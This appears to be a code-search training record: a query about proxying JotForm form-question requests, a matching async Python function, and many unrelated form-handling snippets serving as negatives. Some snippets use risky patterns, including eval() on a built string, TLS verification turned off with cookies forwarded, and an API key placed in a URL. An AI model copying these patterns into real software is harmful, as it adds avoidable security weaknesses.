"def submit_apbs_json():\n\n json_response = None\n http_status_response = None\n\n if request.method == 'POST':\n form = loads(request.data)['form']\n for key in form.keys():\n if key == 'output_scalar':\n for option in form[key]:\n form[option] = option\n form.pop('output_scalar')\n else:\n form[key] = str(form[key])\n # form[key] = unicode(form[key])\n # print('\\n\\n')\n print(pp.pformat(form, indent=4, width=10))\n # print('\\n\\n')\n \n # print(pp.pformat(request.form.to_dict(), indent=4, width=10))\n\n # redirectURL = apbs_cgi.mainInput(request.form)\n # redirectURL = apbs_cgi.mainInput(loads(request.data))\n redirectURL = apbs_cgi.mainInput(form, STORAGE_HOST)\n\n '''=== DEBUG LINE FOR DEV: REMOVE IN FINAL ==='''\n # if 'http://localhost:5000' in redirectURL:\n # print(redirectURL)\n # redirectURL = redirectURL.replace('http://localhost:5000', 'http://localhost:3000')\n # print(redirectURL)\n '''==========================================='''\n\n # return redirect(redirectURL)\n response = make_response(JSONEncoder().encode({'status': 'success'}))\n http_status_code = 202\n\n elif request.method == 'OPTIONS':\n response = make_response(JSONEncoder().encode(json_response))\n response = jobutils.get_request_options(response, 'POST')\n response.headers['Access-Control-Allow-Headers'] = 'x-requested-with,content-type'\n http_status_code = 204\n\n response.headers['Content-Type'] = 'application/json'\n if request.referrer:\n # Add origin header to response if origin is in whitelist\n request_origin_url = request.referrer.split('?')[0]\n if request_origin_url in ORIGIN_WHITELIST:\n cleared_domain = request_origin_url[:request_origin_url.index('/apbs')]\n response.headers['Access-Control-Allow-Origin'] = cleared_domain\n\n return response, http_status_code",
"async def _response_from_proxy(self, form: dict) -> 'Response':\n\n logger = logging.getLogger(__name__)\n logger.debug('_BaseAgent._response_from_proxy: >>> form: {}'.format(form))\n\n rv = None\n if (self.cfg.get('proxy-relay', False)) and ('proxy-did' in form['data']):\n proxy_did = form['data'].pop('proxy-did')\n if (proxy_did != self.did):\n endpoint = json.loads(await self.get_endpoint(proxy_did))\n if (('endpoint' not in endpoint) or\n not re.match(\n CONFIG_JSON_SCHEMA['agent']['properties']['endpoint']['pattern'],\n endpoint['endpoint'],\n re.IGNORECASE)):\n logger.debug('_BaseAgent._response_from_proxy: <!< no agent found for DID {}'.format(proxy_did))\n raise ProxyHop('No agent on the ledger has DID {}'.format(proxy_did))\n if re.match('^http[s]?://.*', endpoint['endpoint'], re.IGNORECASE):\n r = post(\n '{}/{}'.format(endpoint['endpoint'], form['type']),\n json=form) # requests module json-encodes\n if not r.ok:\n logger.debug('_BaseAgent._response_from_proxy: <!< proxy got HTTP {}'.format(r.status_code))\n raise HTTPError(r.status_code, r.reason)\n else:\n logger.debug('_BaseAgent._response_from_proxy: <!< cannot resolve proxy hop')\n raise ProxyHop(\n 'No proxy strategy implemented for target agent endpoint {}'.format(endpoint['endpoint']))\n rv = json.dumps(r.json()) # requests module json-decodes\n\n logger.debug('_BaseAgent._response_from_proxy: <<< {}'.format(rv))\n return rv",
"def _submit_form(self, input_data=None, cache=True):\n if input_data is None:\n input_data = {}\n # only overwrite payload's values if the ``input_data`` value is not None\n # to avoid overwriting of the form's default values\n payload = self._default_form_values().copy()\n for k, v in input_data.items():\n if v is not None:\n payload[k] = v\n url = self._form_action_url\n log.debug(f\"final payload = {payload} from url={url}\")\n response = self._request(\"POST\", url=url, data=payload,\n timeout=self.TIMEOUT, cache=cache)\n response.raise_for_status()\n log.debug(\"Retrieved data from POST request\")\n return response",
"def post_form_data_request():\n url = \"http://httpbin.org/post\"\n payload = {'key1': 'value1', 'key2': 'value2'}\n r = requests.post(url, data=payload)\n print(r.text) # see how data goes into 'form'\n\n \"\"\"\n {\n \"args\": {},\n \"data\": \"\",\n \"files\": {},\n \"form\": {\n \"key1\": \"value1\",\n \"key2\": \"value2\"\n },\n \"headers\": {\n \"Accept\": \"*/*\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Length\": \"23\",\n \"Content-Type\": \"application/x-www-form-urlencoded\",\n \"Host\": \"httpbin.org\",\n \"User-Agent\": \"python-requests/2.5.3 CPython/2.7.9 Darwin/14.1.0\"\n },\n \"json\": null,\n \"origin\": \"74.71.230.126\",\n \"url\": \"http://httpbin.org/post\"\n }\n \"\"\"\n\n # If you want to send data that is not form-encoded, pass in a string\n payload = 'This is a test'\n r = requests.post(url, data=payload)\n print(r.text) # see how it goes to 'data' instead of 'form'\n\n \"\"\"\n {\n \"args\": {},\n \"data\": \"This is a test\",\n \"files\": {},\n \"form\": {},\n \"headers\": {\n \"Accept\": \"*/*\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Length\": \"14\",\n \"Host\": \"httpbin.org\",\n \"User-Agent\": \"python-requests/2.5.3 CPython/2.7.9 Darwin/14.1.0\"\n },\n \"json\": null,\n \"origin\": \"74.71.230.126\",\n \"url\": \"http://httpbin.org/post\"\n }\n \"\"\"",
"def submit_pdb2pqr_json():\n if request.method == 'POST':\n # form_json\n # print(pp.pformat(request.form.to_dict(), indent=4, width=10))\n\n # pp.pprint(request.form.to_dict())\n # print(type(request.form))\n # print(type(request.form.to_dict()))\n\n # redirectURL = main_cgi.mainCGI(request.form, request.files, STORAGE_HOST)\n runner = pdb2pqr_runner.Runner(request.form, request.files, STORAGE_HOST)\n redirectURL = runner.handle_pdb2pqr(STORAGE_HOST)\n # import legacy\n # from legacy.main_cgi import mainCGI\n # redirectURL = mainCGI(request.form, request.files, STORAGE_HOST)\n\n '''=== DEBUG LINE FOR DEV: REMOVE IN FINAL ==='''\n if 'http://localhost:5000' in redirectURL:\n print(redirectURL)\n redirectURL = redirectURL.replace('http://localhost:5000', 'http://localhost:3000')\n print(redirectURL)\n '''==========================================='''\n\n return redirect(redirectURL)",
"def aci_app_proxy():\n if not g.user.is_authenticated: abort(401, \"Unauthorized\")\n if g.user.role != Roles.FULL_ADMIN: abort(403)\n \n # args can be provided via params or post data. If both are provided\n # then post data will be preferred\n is_json = False\n method = request.args.get(\"method\", \"get\").lower()\n url = request.args.get(\"url\", None)\n data = request.args.get(\"data\", {})\n params = request.args.get(\"params\", {})\n try:\n user_json = request.json\n if user_json is not None:\n if \"method\" in user_json: method = user_json[\"method\"]\n if \"url\" in user_json: url = user_json[\"url\"]\n if \"data\" in user_json: data = user_json[\"data\"]\n if \"params\" in user_json: params = user_json[\"params\"]\n except BadRequest as e: pass\n \n # force data from json and back to ensure it's properly formatted \n if data is not None and type(data) is not dict:\n try: data = json.loads(data)\n except Exception as e: abort(400, \"invalid value for 'data'\")\n data = json.dumps(data)\n # leave params as dict as required by requests methods\n if params is not None and type(params) is not dict:\n try: params = json.loads(params)\n except Exception as e: abort(400, \"invalid value for 'params'\")\n\n # validate url and methods\n if type(method) is not str and type(method) is not unicode:\n abort(400, \"invalid value for 'method'\")\n if url is None:\n abort(400, \"missing required attribute 'url'\")\n if type(url) is not str and type(url) is not unicode:\n abort(400, \"invalid value for 'url'\")\n if not re.search(\"^/\", url):\n abort(400, \"invalid value for 'url', must start with / character\") \n\n method = method.lower()\n url = \"%s%s\"%(current_app.config.get(\"PROXY_URL\", \"http://localhost\"),url)\n header = {}\n if \"/api/\" in url: \n header = {\"content-type\":\"application/json\"}\n is_json = True\n if method == \"get\":\n r = requests.get(url, verify=False, data=data, params=params,\n cookies=request.cookies,headers=header)\n elif method == \"post\":\n r = requests.post(url, verify=False, data=data, params=params,\n cookies=request.cookies,headers=header)\n elif method == \"delete\":\n r = requests.delete(url, verify=False, data=data, params=params,\n cookies=request.cookies,headers=header)\n else:\n abort(400, \"invalid value for 'method'\")\n \n if r.status_code != 200:\n # if json was provided in the status code with attribute error, \n # extract it and provide just the error text back to user\n text = r.text\n try: \n js = r.json()\n if \"error\" in js: text = js[\"error\"] \n except Exception as e: pass\n abort(r.status_code, text)\n if is_json:\n try: return jsonify(r.json())\n except Exception as e:\n r1 = re.search(\"https?://[^/]+(?P<clean>.*)\", r.url)\n if r1 is not None: clean = r1.group(\"clean\")\n else:clean = r.url\n abort(500, \"proxy to (%s)%s failed, received non-json reply\" % (\n method, clean))\n else:\n return make_response(r.text)",
"def post(self, request, *args, **kwargs):\n # # data['input_data'] = request.data['input_data']\n data = {}\n try:\n data['submission_name'] = request.data['submission_name']\n data['email'] = request.data['email']\n data['job'] = request.data['job']\n data['ip'] = get_ip(request)\n data['UUID'] = str(uuid.uuid1())\n except MultiValueDictKeyError:\n content = {'error': \"Input does not contain all required fields\"}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)\n # TODO : We could return a message specifying what is missing.\n\n # work out which job this refers to\n if Job.objects.filter(name=data['job']).exists():\n data['job'] = Job.objects.get(name=data['job']).pk\n else:\n content = {'error': 'Job name supplied does not exist'}\n return Response(content, status=status.HTTP_406_NOT_ACCEPTABLE)\n # TODO: VALIDATE input_data IN SOME MANNER\n submission_form = SubmissionForm(data, request.FILES)\n if submission_form.is_valid():\n s = submission_form.save()\n # Send to the Job Queue and set queued message if that is a success\n job = Job.objects.get(name=s.job)\n steps = job.steps.all().select_related('task').extra(order_by=['ordering'])\n # 1. Look up tasks in a job\n # 2. Order tasks by their step id\n total_steps = len(steps)-1\n current_step = 0\n chain = \"(\"\n for step in steps:\n chain += \"task_runner.si('%s','%i','%i','%i','%s') | \" % (s.UUID,\n step.ordering,\n current_step,\n total_steps,\n step.task.name)\n current_step += 1\n\n chain = chain[:-3]\n chain += ')()'\n try:\n eval(chain)\n except SyntaxError:\n print('Invalid string eval on: ' + chain)\n # 3. Build Celery chain\n # 4. Call delay on the Celery chain\n\n content = {'UUID': s.UUID, 'submission_name': s.submission_name}\n return Response(content, status=status.HTTP_201_CREATED)\n else:\n content = {'error': submission_form.errors}\n return Response(content, status=status.HTTP_400_BAD_REQUEST)",
"def post(self, request, *args, **kwargs):\n form = self.get_form()\n if form.is_valid():\n recaptcha_response = request.POST.get('g-recaptcha-response')\n recaptcha_valid = self.validate_recaptcha(recaptcha_response)\n if recaptcha_valid:\n forwarded_to_salesforce = self.send_to_salesforce(request, form)\n if forwarded_to_salesforce:\n return self.form_valid(form)\n else:\n form.add_error(None, 'Server error. Please try again.')\n return self.form_invalid(form)\n else:\n form.add_error(None, 'Invalid captcha.')\n return self.form_invalid(form)\n else:\n return self.form_invalid(form)",
"def outputServerStub():\r\n data = request.form\r\n print(data)\r\n return jsonify(isError= False,\r\n message= \"Success\",\r\n statusCode= 200,\r\n data= data), 200",
"def generate_form_request_handler(header, text,\n on_form_valid=add_worker_to_roles,\n roles=[],\n django_form=ChooseWorkerForm,\n update_form=add_workers_to_choose_worker_form,\n finish_page=\"install_checklist\",\n svc_proxy=get_geppetto_web_service_client()):\n\n @login_required\n def handle_form(request):\n service = svc_proxy\n if (request.method == 'POST'):\n form = django_form(request.POST)\n update_form(form=form, service=service, roles=roles)\n if form.is_valid():\n on_form_valid_result = on_form_valid(form=form, \\\n service=service, roles=roles)\n if on_form_valid_result != None:\n return on_form_valid_result\n else:\n return redirect(finish_page)\n else:\n form = django_form()\n update_form(form=form, service=service, roles=roles)\n return render_to_response('ui/install_step.html',\n {'form': form, 'text': text, 'header': header},\n context_instance=RequestContext(request))\n return handle_form",
"def post(self):\n\n contenttype = self.request.headers['Content-Type']\n if contenttype == 'application/x-www-form':\n result, response = self.handle_request(self.request.get('message'))\n elif contenttype == 'text/json':\n result, response = self.handle_request(self.request.body)\n else:\n result, response = False, \"Invalid encoding: \" + contenttype \n\n self.response.headers['Content-Type'] = 'text/plain'\n self.response.out.write(jenc().encode({'success': result, 'value': response}))",
"async def process_post(self, form: dict) -> str:\n\n logger = logging.getLogger(__name__)\n logger.debug('AgentRegistrar.process_post: >>> form: {}'.format(form))\n\n # Try dispatching to each ancestor from _BaseAgent first\n mro = AgentRegistrar._mro_dispatch()\n for ResponderClass in mro:\n try:\n rv = await ResponderClass.process_post(self, form)\n logger.debug('AgentRegistrar.process_post: <<< {}'.format(rv))\n return rv\n except TokenType:\n pass\n\n if form['type'] == 'agent-nym-send':\n # base listening agent code handles all proxied requests: it's agent-local, carry on\n await self.send_nym(\n form['data']['agent-nym']['did'],\n form['data']['agent-nym']['verkey'],\n form['data']['agent-nym'].get('alias', None))\n rv = json.dumps({})\n logger.debug('AgentRegistrar.process_post: <<< {}'.format(rv))\n return rv\n\n logger.debug('AgentRegistrar.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not support token type {}'.format(self.__class__.__name__, form['type']))",
"def post_method(form):\n return MethodStub(method.Post, form)",
"def make_request(self, response, *args, form=None, formdata=None, link_type, **kwargs):\n #print(\"In make_request\")\n meta = {'source_url': response.url, 'link_type': link_type}\n if form is None:\n assert formdata is None\n return response.follow(meta=meta, *args, **kwargs)\n else:\n assert formdata is not None\n # from https://github.com/scrapy/scrapy/blob/master/scrapy/http/request/form.py#L39\n # which does not allow us to pass an already-found lxml form Element, unfortunately\n kwargs.setdefault('encoding', response.encoding)\n formdata = scrapy_get_inputs(form, formdata,\n dont_click=None, clickdata=None, response=response)\n\n base_url = get_base_url(response)\n action = form.get('action')\n url = base_url if action is None else urljoin(base_url, strip_html5_whitespace(action))\n method = kwargs.pop('method', form.method)\n return FormRequest(url=url, formdata=formdata, method=method,\n meta=meta, *args, **kwargs)",
"def send_request(self):\n if self.redirect and self.req is None:\n fet(self.url).then(self.response_redirect).then(\n self.redirect_url).catch(lambda ev: self.on_error(ev.message))\n elif self.redirect is None and self.req is None:\n if self.response_type == \"json\":\n fet(self.url).then(self.response).then(lambda ev: self.on_response(\n Modif(ev))).catch(lambda ev: self.on_error(ev.message))\n else:\n fet(self.url).then(self.response).then(self.on_response).catch(\n lambda ev: self.on_error(ev.message))\n elif self.redirect is None and self.req:\n if self.response_type == \"json\":\n fet(self.req).then(self.response).then(lambda ev: self.on_response(\n Modif(ev))).catch(lambda ev: self.on_error(ev.message))\n else:\n fet(self.req).then(self.response).then(self.on_response).catch(\n lambda ev: self.on_error(ev.message))",
"def get_data(req):\n if len(req.form) == 0:\n return req.json\n return req.form",
"def luanize_post_sync():\n return jsonify(response(request.form[\"text\"]))",
"def do_POST(self):\n \n # Determine the post's content type.\n if self.headers.typeheader is None:\n content_type_header = self.headers.type\n else:\n content_type_header = self.headers.typeheader\n content_type, params = cgi.parse_header(content_type_header)\n # We only know how to handle form-data submissions.\n if content_type == \"multipart/form-data\":\n # Parse the form data.\n fields = cgi.parse_multipart(self.rfile, params) \n # For each field, take the first value, discarding others.\n # We don't support multi-valued fields.\n for name, value in fields.items():\n if len(value) == 1:\n fields[name] = value[0]\n # There may be additional query arguments in the URL, so\n # parse that too.\n script_url, url_fields = parse_url_query(self.path)\n # Merge query arguments from the form and from the URL.\n fields.update(url_fields)\n # Create and process a request.\n request = apply(WebRequest, (script_url, ), fields)\n # Store the client's IP address with the request.\n request.client_address = self.client_address[0]\n self.__HandleRequest(request)\n else:\n self.send_response(400,\n \"Unexpected request (POST of %s).\"\n % content_type)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Proxy form question requests. Proxy the requests to get all the questions of a form to the JotForm API and return the responses verbatim. For more information on request and response formats,
|
async def proxy_get_questions(uuid: str):
credentials = redis.get(uuid)
if credentials is None:
raise HTTPError(401, "Unauthorised request.")
app_key, poll_id = credentials.decode("utf-8").split(
"-") # Get back user credentials.
reply = get(f"https://api.jotform.com/form/" + # Generate URL
f"{poll_id}/questions?apiKey={app_key}")
return Response(content=reply.content,
media_type=getattr(reply,"media_type", "application/json"))
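The stats endpoint further down relies on a get_question_ids helper that presumably hits this same questions endpoint directly instead of going through the proxy. One hedged way it could be written, assuming the usual JotForm envelope where the payload sits under a "content" object keyed by question ID (worth verifying against the JotForm API documentation):

from requests import get


def get_question_ids(app_key: str, poll_id: str) -> list[str]:
    # Illustrative implementation, not taken from the source.
    reply = get(f"https://api.jotform.com/form/{poll_id}/questions?apiKey={app_key}")
    reply.raise_for_status()  # surface upstream failures instead of parsing an error body
    payload = reply.json()
    # JotForm responses are assumed to look like {"content": {"<qid>": {...}, ...}}.
    return list(payload.get("content", {}).keys())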
|
[
"def do_answer():\n global nextQuestion, responses\n answer = request.form['answer']\n responses.append(answer)\n nextQuestion += 1\n if nextQuestion >= len(survey.questions):\n return redirect(\"/thanks\")\n return redirect(f\"/questions/{nextQuestion}\")",
"def __init__(self, question):\n self.question = question\n self.responses = []",
"async def _response_from_proxy(self, form: dict) -> 'Response':\n\n logger = logging.getLogger(__name__)\n logger.debug('_BaseAgent._response_from_proxy: >>> form: {}'.format(form))\n\n rv = None\n if (self.cfg.get('proxy-relay', False)) and ('proxy-did' in form['data']):\n proxy_did = form['data'].pop('proxy-did')\n if (proxy_did != self.did):\n endpoint = json.loads(await self.get_endpoint(proxy_did))\n if (('endpoint' not in endpoint) or\n not re.match(\n CONFIG_JSON_SCHEMA['agent']['properties']['endpoint']['pattern'],\n endpoint['endpoint'],\n re.IGNORECASE)):\n logger.debug('_BaseAgent._response_from_proxy: <!< no agent found for DID {}'.format(proxy_did))\n raise ProxyHop('No agent on the ledger has DID {}'.format(proxy_did))\n if re.match('^http[s]?://.*', endpoint['endpoint'], re.IGNORECASE):\n r = post(\n '{}/{}'.format(endpoint['endpoint'], form['type']),\n json=form) # requests module json-encodes\n if not r.ok:\n logger.debug('_BaseAgent._response_from_proxy: <!< proxy got HTTP {}'.format(r.status_code))\n raise HTTPError(r.status_code, r.reason)\n else:\n logger.debug('_BaseAgent._response_from_proxy: <!< cannot resolve proxy hop')\n raise ProxyHop(\n 'No proxy strategy implemented for target agent endpoint {}'.format(endpoint['endpoint']))\n rv = json.dumps(r.json()) # requests module json-decodes\n\n logger.debug('_BaseAgent._response_from_proxy: <<< {}'.format(rv))\n return rv",
"def question_list(request, format=None):\n if request.method == 'GET':\n questions = Question.objects.all()\n serializer = QuestionSerializer(questions, many=True)\n return Response(serializer.data)\n\n elif request.method == 'POST':\n serializer = QuestionSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)",
"def answer_page():\n resps = session[\"responses\"]\n answer = request.form.get(\"answer\")\n resps.append(answer)\n session[\"responses\"] = resps\n num = len(session[\"responses\"])\n if num < len(satisfaction_survey.questions):\n return redirect(f\"/questions/{num}\")\n return redirect(\"/thanks\")",
"def test_get_specific_question(self):\n self.token = self.get_token()\n head = {'Content-Type': 'application/json', 'Authorization': 'JWT {}'.format(self.token)}\n\n self.test_client().post('/api/v1/questions', \\\n data=json.dumps(self.question), headers=head)\n\n question = self.test_client().get('/api/v1/questions/1', headers = head)\n self.assertEqual(question.status_code, 200)\n self.assertIn(\"How to create an api?\", str(question.data))",
"def quiz():\n if request.method == 'POST':\n # Cleanup our form data into something more manageable\n form_data = {k: v[0] for k, v in dict(request.form).iteritems()}\n tool_data, notes = choose_tools(form_data)\n return results(True, tool_data, notes)\n else:\n return render_template('quiz.html')",
"def question(request, id):\r\n q = Question.objects.get(pk = id)\r\n a = q.answer_set.filter(deleted = False).order_by('-created')[:20]\r\n if request.method == 'GET':\r\n aform = aforms.AnswerForm()\r\n payload = {'question':q, 'answers':a, 'aform':aform, }\r\n return render_to_response('moments/question.html', payload, RequestContext(request))",
"def view_edit_question(request):\n ###load the question number and test id###\n if 'user' not in request.session.keys() or 'teacher' not in request.session['user']['roles'] :\n return HTTPFound(location='/')\n \n test_id = int(request.GET[\"id\"])\n quesiton_num = 1\n try:\n question_num = int(request.GET[\"question\"])\n except:\n question_num = 1\n\n ###load the test and it's questions and their answers from the database###\n dbsession = DBSession()\n test = dbsession.query(Test).filter(Test.id==test_id).first()\n all_questions = dbsession.query(Question).filter(\n Question.test_id==test.id).all()\n total_questions = len(all_questions)\n for q in all_questions:\n if q.question_num == question_num:\n question = q\n\n post = request.POST\n if 'submit changes' in post:\n controls = post.items()\n parse_edit_form_data(controls, dbsession, question)\n location ='/edit_test?id='+str(test.id)\n return HTTPSeeOther(location=location)\n \n main = get_renderer('templates/master.pt').implementation()\n \n if (question.question_type == \"multipleChoice\" or\n question.question_type == \"selectTrue\"):\n all_answers = dbsession.query(Answer).filter(\n Answer.question_id==question.id).all()\n answers = []\n for answer in all_answers:\n answers.append({\"text\":answer.answer,'correct':answer.correct})\n schema = EditQuestionSchema()\n appstruct = {'text':(question.question),'answers':answers}\n if question.question_type == \"shortAnswer\":\n schema = EditShortAnswerQuestionSchema()\n appstruct = {'text':(question.question)}\n form = Form(schema, buttons=('submit changes',), \n use_ajax=True)\n form = form.render(appstruct)\n return {\"test\":test,'form':form, 'question': question, 'main': main}",
"def get(self):\n return get_all_questions()",
"async def process_post(self, form: dict) -> str:\n\n logger = logging.getLogger(__name__)\n logger.debug('_BaseAgent.process_post: >>> form: {}'.format(form))\n\n validate_form(form, self.cfg.get('proxy-relay', False))\n\n if form['type'] == 'agent-nym-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = await self.get_nym(form['data']['agent-nym']['did'])\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'agent-endpoint-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = await self.get_endpoint(form['data']['agent-endpoint']['did'])\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'agent-endpoint-send':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n resp_json = await self.send_endpoint()\n rv = json.dumps({})\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] == 'schema-lookup':\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n s_key = schema_key_for(form['data']['schema'])\n schema_json = await self.get_schema(s_key)\n schema = json.loads(schema_json)\n if not schema:\n rv = schema_json\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n rv = schema_json\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n elif form['type'] in (\n 'agent-nym-send',\n 'schema-send',\n 'claim-def-send',\n 'claim-offer-create',\n 'claim-offer-store',\n 'claim-create',\n 'claim-store',\n 'claim-request',\n 'proof-request',\n 'proof-request-by-referent',\n 'verification-request'): # do not proxy: master-secret-set, claims-reset\n resp_proxy_json = await self._response_from_proxy(form)\n if resp_proxy_json != None:\n rv = resp_proxy_json # it's proxied\n logger.debug('_BaseAgent.process_post: <<< {}'.format(rv))\n return rv\n\n # base listening agent doesn't do this work\n logger.debug('_BaseAgent.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not respond to token type {}'.format(self.__class__.__name__, form['type']))\n\n logger.debug('_BaseAgent.process_post: <!< not this form type: {}'.format(form['type']))\n raise TokenType('{} does not support token type {}'.format(self.__class__.__name__, form['type']))",
"def form(self):\n return self.question.form_class(question=self.question)",
"def question(request):\n\n # first check if we should be showing the results page instead\n # (if they have answered all the questions)\n if 'show_results' in request.COOKIES.keys() and (\n request.COOKIES['show_results'] == 'yes'):\n return show_results(request)\n\n current_q = None\n visitor = None\n new_visitor = False\n\n if request.method == 'POST':\n # The user has submitted an answer to a question.\n # Get User ID\n if 'visitor' in request.COOKIES.keys():\n visitor = Visitor.objects.get(id=request.COOKIES['visitor'])\n else: # if this is a new visitor\n visitor = Visitor()\n visitor.save()\n new_visitor = True\n\n is_yes = request.POST.get(\"yesno\") == 'yes'\n is_skip = request.POST.get(\"yesno\") not in (\"yes\", \"no\")\n current_q = Question.objects.get(\n id=request.POST.get(\"qnumber\"))\n if not Answer.objects.filter(\n question=current_q.id, visitor=visitor\n ).exists() and not is_skip:\n # The user has not answered this question yet. Count the response.\n answer = Answer(yes=is_yes, question=current_q, visitor=visitor)\n answer.save()\n\n question = get_next_question(current_q.id if current_q else 0)\n if question:\n # Display the new question to the user.\n question_number = get_question_number(question.id)\n question_total = get_question_total()\n context = {\n 'question': question,\n 'percent_no': get_percent_no(question),\n 'question_number': question_number,\n 'question_total': question_total,\n }\n response = render(request, 'question.html', context)\n if new_visitor:\n response.set_cookie(\"visitor\", visitor.id)\n return response\n\n else:\n # We have iterated through all questions.\n # Set a cookie for question completion and display the results page.\n response = show_results(request)\n response.set_cookie('show_results', 'yes')\n if new_visitor:\n response.set_cookie(\"visitor\", visitor.id)\n return response",
"def form_response_list(formId):\n from ..main import app\n form = Form.objects.only(\"formOptions\", \"cff_permissions\").get({\"_id\":ObjectId(formId)})\n # todo: use search framework, don't return all!\n query = app.current_request.query_params and app.current_request.query_params.get(\"query\", None)\n autocomplete = app.current_request.query_params and app.current_request.query_params.get(\"autocomplete\", None)\n search_by_id = app.current_request.query_params and app.current_request.query_params.get(\"search_by_id\", None)\n show_unpaid = app.current_request.query_params and app.current_request.query_params.get(\"show_unpaid\", None)\n if query:\n # autocomplete, participant name, assign bibs functionality\n app.check_permissions(form, [\"Responses_View\", \"Responses_CheckIn\"])\n search_fields = get(form.formOptions.dataOptions, \"search.searchFields\", [\"_id\"])\n if search_by_id is not None:\n search_fields = [\"_id\"]\n result_limit = get(form.formOptions.dataOptions, \"search.resultLimit\", 10)\n result_fields = get(form.formOptions.dataOptions, \"search.resultFields\", [\"_id\"])\n autocomplete_fields = get(form.formOptions.dataOptions, \"search.autocompleteFields\", [\"_id\"])\n if show_unpaid is not None:\n default_mongo_query = {\"paid\": False}\n else:\n default_mongo_query = {\"paid\": True}\n mongo_query = {\"$or\": []}\n for word in query.split(\" \"):\n for field in search_fields:\n if field == \"_id\":\n if len(word) <= 24:\n try:\n queryObjectIdStart = ObjectId(word + \"0\" * (24 - len(word))) # fill in zeroes to create object id, e.g. 5cba --> 5cba0000000000000000000\n queryObjectIdEnd = ObjectId(word + \"e\" * (24 - len(word)))\n mongo_query[\"$or\"].append({field: {\"$gte\": queryObjectIdStart, \"$lte\": queryObjectIdEnd} })\n except bson.errors.InvalidId:\n pass\n else:\n if field.startswith(\"value.participants.\"):\n _, subfield = field.split(\"value.participants.\")\n mongo_query[\"$or\"].append({\"value.participants\": {\n \"$elemMatch\": {\n subfield: {\n \"$regex\": '^' + word, \"$options\" : \"i\"\n }\n }\n }\n })\n else:\n mongo_query[\"$or\"].append({field: {\"$regex\": '^' + word, \"$options\" : \"i\"}})\n mongo_query[\"form\"] = form.id\n if len(mongo_query[\"$or\"]) == 0:\n del mongo_query[\"$or\"]\n # Default query paid = True\n if mongo_query:\n mongo_query = {\"$and\": [default_mongo_query, mongo_query]}\n else:\n mongo_query = default_mongo_query\n if autocomplete is not None:\n projection = {field: 1 for field in autocomplete_fields}\n result_limit = 5\n else:\n projection = {}\n for field in result_fields:\n projection[field] = 1\n responses = Response.objects.raw(mongo_query).limit(result_limit).project(projection)\n else:\n app.check_permissions(form, [\"Responses_View\"])\n responses = Response.objects.all()._collection.find({\"form\": form.id}, {\"value\": 1, \"_id\": 1, \"amount_paid\": 1, \"user\": 1, \"form\": 1, \"paymentInfo\": 1, \"date_created\": 1, \"date_modified\": 1, \"paid\": 1, \"counter\": 1})\n return {\"res\": [r for r in json.loads(dumps(responses))] }\n return {\"res\": [serialize_model(r) for r in responses]}",
"def test():\n session['responses'] = []\n return redirect(url_for('questions', num=0))",
"def view_question(request):\n if authenticated_userid(request) == None or 'user' not in request.session.keys():\n return HTTPFound(location='/')\n main = get_renderer('templates/master.pt').implementation()\n ###load the question number and test id###\n test_id = int(request.GET[\"id\"])\n quesiton_num = 1\n try:\n question_num = int(request.GET[\"question\"])\n except:\n question_num = 1\n\n ###load the test and it's questions and their answers from the database###\n dbsession = DBSession()\n test = dbsession.query(Test).filter(Test.id==test_id).first()\n if attempts_remaining(dbsession, test.id, request.session['user']['name']) <= 0:\n return HTTPFound(location='/') #if no more attempts left\n if (test.start_time - datetime.datetime.now()) > (datetime.timedelta(0)):\n return HTTPFound(location='/') #if it's too early to take\n if (test.end_time - datetime.datetime.now()) < (datetime.timedelta(0)):\n return HTTPFound(location='/') #if it's too late to take\n all_questions = dbsession.query(Question).filter(\n Question.test_id==test.id).all()\n total_questions = len(all_questions)\n for q in all_questions:\n \n if q.question_num == question_num:\n question = q\n\n ###create \"current_test\" in the session object###\n session = request.session\n user_choice = ''\n if \"current_test\" not in session.keys() or (\n session[\"current_test\"][\"name\"] != test.name):\n session[\"current_test\"] = {\"name\": test.name}\n\n ###load any previously selected answer to this question###\n if str(question_num) in session['current_test'].keys():\n user_choice = session['current_test'][str(question_num)]\n\n ###check if a question was submited and put the answer in the session###\n post = request.POST\n if 'review test' in post or 'next question' in post:\n controls = post.items()\n answer = \"na\"\n i = 0\n if question.question_type == \"shortAnswer\":\n for control in controls:\n if control[0] == 'answer':\n answer = str(control[1])\n if question.question_type == \"multipleChoice\":\n for control in controls:\n if control[0] == 'deformField1':\n answer = str(control[1])\n if question.question_type == \"selectTrue\":\n answer = []\n for control in controls:\n if control[0] == 'checkbox':\n answer.append(control[1])\n session[\"current_test\"][str(question_num)]=answer \n #store selected answer\n if 'next question' in post:\n return HTTPFound(location='/question?id='+str(test.id)+\n ';question='+str(question_num+1))\n if 'review test' in post: #check if it was the last question\n #if so redirect to the test's submit page\n return HTTPFound(location='/test?id='+str(test.id))\n\n ###create the question's form###\n if question.question_type == \"multipleChoice\":\n schema = 